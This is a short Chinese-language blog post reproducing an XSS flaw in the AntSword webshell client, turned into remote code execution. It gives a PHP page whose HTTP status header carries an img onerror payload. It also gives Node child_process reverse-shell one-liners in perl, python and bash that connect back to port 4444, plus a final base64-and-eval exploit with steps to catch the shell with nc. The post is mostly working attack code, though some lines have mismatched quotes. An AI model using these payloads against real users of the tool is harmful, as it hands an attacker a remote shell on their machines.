前几天蚁剑暴X®S©S(E),所以复现看看
1
2
3
| <?php
header('HTTP/1.1 500 <img src=# onerror=alert(/AntSword-XSS/)>');
?>
|
弹shell
写入自己喜欢的弹shell方式到,exec()内,然后进行base64加密
perl:
1
2
3
| require('child_process').exec('perl -e 'use Socket;$i="127.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'',(error, stdout, stderr)=>{
alert(`stdout: ${stdout}`);
});
|
python:
1
2
3
| require('child_process').exec('python -c \’import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash”,”-i”]);\’’,(error, stdout, stderr)=>{
alert(`stdout: ${stdout}`);
});
|
bash:
1
2
3
| require('child_process').exec('bash -i >& /dev/tcp/127.0.0.1/4444 0>&1’,(error, stdout, stderr)=>{
alert(`stdout: ${stdout}`);
});
|
最终的exp
1
2
3
| <?php
header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`base64编码内容`,`base64`).toString())'>");
?>
|
nc监听4444,蚁剑添加webshell,双击打开后,成功弹回bash
PS:
这里有个坑,就是,用py、bash、nc之类的弹不回shell,用perl就行。不知道怎么回事。后面再研究院研究